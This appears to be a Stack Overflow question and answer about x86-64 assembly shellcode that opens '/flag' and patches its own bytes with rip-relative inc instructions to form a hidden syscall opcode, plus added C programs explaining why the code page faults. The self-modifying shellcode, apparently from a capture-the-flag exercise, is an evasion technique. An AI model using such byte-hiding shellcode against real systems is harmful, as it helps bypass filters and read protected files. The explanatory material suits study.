0

I am trying to modify .byte 0x0e and .byte 0x04. I tried to use inc byte ptr [rip+offset] to get to the address of .byte 0x0e and .byte 0x04 and change them. I ran gef and got SIGSEGV at those commands. The offset should be correct, as I ran objdump and it shows the index byte of hex correctly.

I tried to use lea r11, [_start] to get to the address but it did not work when I assemble the code.

.global _start
_start:
.intel_syntax noprefix
    mov rdx, 0x00000067616c662f    # "/flag\0" in little-endian byte order
    push rdx                       # the path now sits at [rsp]
    mov rax, 2                     # SYS_open on x86-64
    mov rdi, rsp                   # rdi = pointer to the path
    xor rsi, rsi                   # flags = O_RDONLY
    inc byte ptr [rip+0xc]         # rip-relative stores into the code bytes below
    inc byte ptr [rip+0x6]
    inc byte ptr [rip+0x1]
    .byte 0x0d
    .byte 0x04
  • .byte 0x0d should be modified to .byte 0x0f
  • .byte 0x04 should be modified to .byte 0x05
  • Then a syscall should be initiated with 0f 05
Michael Petch
Gan Sama
Code (the `.text` section) is in executable read-only pages. It can't be written to by default. This answer may be related: https://stackoverflow.com/questions/27581279/make-text-segment-writable-elf. Your exploit, though, when running in a target program won't have this problem because the stack is writable, but in that case you have to mark the stack as executable (i.e. https://stackoverflow.com/a/57846177/3857942). – Michael Petch Sep 13 '19 at 16:20
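The comment above is the whole story behind the SIGSEGV: the `inc byte ptr [rip+...]` stores land in a mapping that is readable and executable but not writable. The program below is an added example, not code from the question or the answer; it reads `/proc/self/maps` (Linux only) and reports the protection of the page holding a function versus the page holding a writable global, so the difference can be checked rather than guessed. The probe names `code_probe` and `data_probe` are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the question or the answer. Linux only: reads
 * /proc/self/maps to report the protection of the page holding `addr`.
 * A store aimed at a page without 'w' raises a page fault, which the
 * kernel delivers to the process as SIGSEGV. */

/* Copies the 4-character permission field (e.g. "r-xp") of the mapping that
 * contains `addr` into `perms`. Returns 1 if found, 0 otherwise. */
int perms_for_address(const void *addr, char perms[5])
{
    FILE *maps = fopen("/proc/self/maps", "r");
    if (!maps)
        return 0;
    uintptr_t target = (uintptr_t)addr;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, maps)) {
        unsigned long lo, hi;
        char p[5];
        /* Each line starts "lo-hi perms ..." with hex addresses. */
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, p) != 3)
            continue;
        if (target >= lo && target < hi) {
            memcpy(perms, p, 5);
            found = 1;
            break;
        }
    }
    fclose(maps);
    return found;
}

/* 1 if the page holding `addr` is writable, 0 if not, -1 if unknown. */
int is_writable(const void *addr)
{
    char perms[5];
    if (!perms_for_address(addr, perms))
        return -1;
    return perms[1] == 'w';
}

/* 1 if the page holding `addr` is executable, 0 if not, -1 if unknown. */
int is_executable(const void *addr)
{
    char perms[5];
    if (!perms_for_address(addr, perms))
        return -1;
    return perms[2] == 'x';
}

/* Probes (hypothetical names): one symbol in the code segment, one in
 * writable data. */
int code_probe(int x) { return x + 1; }
int data_probe = 42;

/* Accessors so callers need not cast a function pointer themselves. */
const void *code_probe_addr(void) { return (const void *)(uintptr_t)code_probe; }
const void *data_probe_addr(void) { return &data_probe; }

int main(void)
{
    char perms[5];
    if (perms_for_address(code_probe_addr(), perms))
        printf("code_probe page: %s (no 'w': a store to it faults)\n", perms);
    if (perms_for_address(data_probe_addr(), perms))
        printf("data_probe page: %s\n", perms);
    return 0;
}
```

On a stock Linux build the code page reports `r-xp` and the data page `rw-p`; the asker's `.byte` operands live in the former, which is why the `inc` faults even though objdump shows the displacement reaching the right byte.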

1 Answer

-1

Wouldn't you want your .byte to be 0x0e, if you want to inc it to 0x0f? The syntax you want for the lea statement is

lea r11, _start[rip]

You can put your .byte pieces under another section and inc byte ptr section_name[rip] so you don't need to know the actual distance to the memory in question, then jmp to the section to execute the syscall.

Bhargav Rao
Tyler
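The difference between the asker's literal `[rip+0xc]` and the answer's `label[rip]` form is only who computes the displacement: with a label the assembler measures the distance from the end of the instruction to the label, with a literal the asker has to. The program below is an added example, not code from the question or the answer; it encodes `inc byte ptr target[rip]` the way an assembler would (FE 05 followed by a little-endian disp32, 6 bytes), resolves the three literal displacements from the question against a constructed copy of the snippet's tail, and applies the increments to that copy as a static analysis, without executing anything. It shows that the first two incs both resolve to the `.byte 0x0d` (so 0x0d + 2 = 0x0f) and the third to `.byte 0x04`, and that the label form produces byte-identical encoding. The constant `ASKER_TAIL` and the function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the question or the answer.
 * x86-64 encoding used here: inc byte ptr [rip+disp32] == FE 05 <disp32 LE>,
 * 6 bytes; rip-relative displacements are measured from the END of the
 * instruction, which is what `label[rip]` in GAS Intel syntax resolves to. */
#define INC_RIP_LEN 6

/* What the assembler computes for `inc byte ptr label[rip]`. */
int32_t rip_disp_for(size_t insn_start, size_t insn_len, size_t target)
{
    return (int32_t)((int64_t)target - (int64_t)(insn_start + insn_len));
}

/* What the CPU computes at run time for `[rip+disp]`. */
size_t rip_target(size_t insn_start, size_t insn_len, int32_t disp)
{
    return (size_t)((int64_t)insn_start + (int64_t)insn_len + disp);
}

/* Emit `inc byte ptr target[rip]` at image offset insn_start; returns bytes written. */
size_t encode_inc_rip(uint8_t *out, size_t insn_start, size_t target)
{
    int32_t disp = rip_disp_for(insn_start, INC_RIP_LEN, target);
    out[0] = 0xFE;
    out[1] = 0x05;
    for (int i = 0; i < 4; i++)              /* disp32, little-endian */
        out[2 + i] = (uint8_t)(((uint32_t)disp >> (8 * i)) & 0xFF);
    return INC_RIP_LEN;
}

/* Static walk from offset 0: decode consecutive `inc byte ptr [rip+disp32]`
 * instructions and apply each to the image, stopping at the first byte that
 * is not one. Returns the number applied, or -1 if a target is out of range. */
int simulate_incs(uint8_t *image, size_t len)
{
    size_t pc = 0;
    int applied = 0;
    while (pc + INC_RIP_LEN <= len && image[pc] == 0xFE && image[pc + 1] == 0x05) {
        uint32_t raw = 0;
        for (int i = 0; i < 4; i++)
            raw |= (uint32_t)image[pc + 2 + i] << (8 * i);
        size_t target = rip_target(pc, INC_RIP_LEN, (int32_t)raw);
        if (target >= len)
            return -1;
        image[target]++;
        pc += INC_RIP_LEN;
        applied++;
    }
    return applied;
}

/* Constructed copy of the tail of the asker's snippet: the three incs with the
 * literal displacements from the question, then the two data bytes. */
static const uint8_t ASKER_TAIL[20] = {
    0xFE, 0x05, 0x0C, 0x00, 0x00, 0x00,   /* inc byte ptr [rip+0xc] -> offset 18 */
    0xFE, 0x05, 0x06, 0x00, 0x00, 0x00,   /* inc byte ptr [rip+0x6] -> offset 18 */
    0xFE, 0x05, 0x01, 0x00, 0x00, 0x00,   /* inc byte ptr [rip+0x1] -> offset 19 */
    0x0D,                                 /* .byte 0x0d */
    0x04,                                 /* .byte 0x04 */
};

/* Applies the incs to a copy of ASKER_TAIL and returns the final two data
 * bytes packed as 0xHHLL (0 on failure). */
uint16_t run_asker_tail(void)
{
    uint8_t image[sizeof ASKER_TAIL];
    memcpy(image, ASKER_TAIL, sizeof image);
    if (simulate_incs(image, sizeof image) != 3)
        return 0;
    return (uint16_t)((image[18] << 8) | image[19]);
}

/* Re-encodes the tail with the answer's `label[rip]` form (targets 18, 18, 19)
 * and returns 1 if the bytes equal the asker's literal-displacement version. */
int labels_match_literal(void)
{
    static const size_t targets[3] = {18, 18, 19};
    uint8_t built[sizeof ASKER_TAIL];
    size_t off = 0;
    for (int i = 0; i < 3; i++)
        off += encode_inc_rip(built + off, off, targets[i]);
    built[off++] = 0x0D;
    built[off++] = 0x04;
    return off == sizeof built && memcmp(built, ASKER_TAIL, sizeof built) == 0;
}

int main(void)
{
    for (size_t pc = 0; pc < 18; pc += INC_RIP_LEN)
        printf("inc at %2zu -> target %zu\n", pc,
               rip_target(pc, INC_RIP_LEN, (int32_t)ASKER_TAIL[pc + 2]));
    printf("after incs: %04x, label form identical: %d\n",
           run_asker_tail(), labels_match_literal());
    return 0;
}
```

The walk is deliberately a static analysis: the literal displacements already reach the bytes the asker wanted, so the offsets were never the problem, and the answer's `label[rip]` form assembles to the same bytes while sparing the writer the hand count. What decides whether the stores succeed is the page protection discussed in the comment on the question, not the addressing mode.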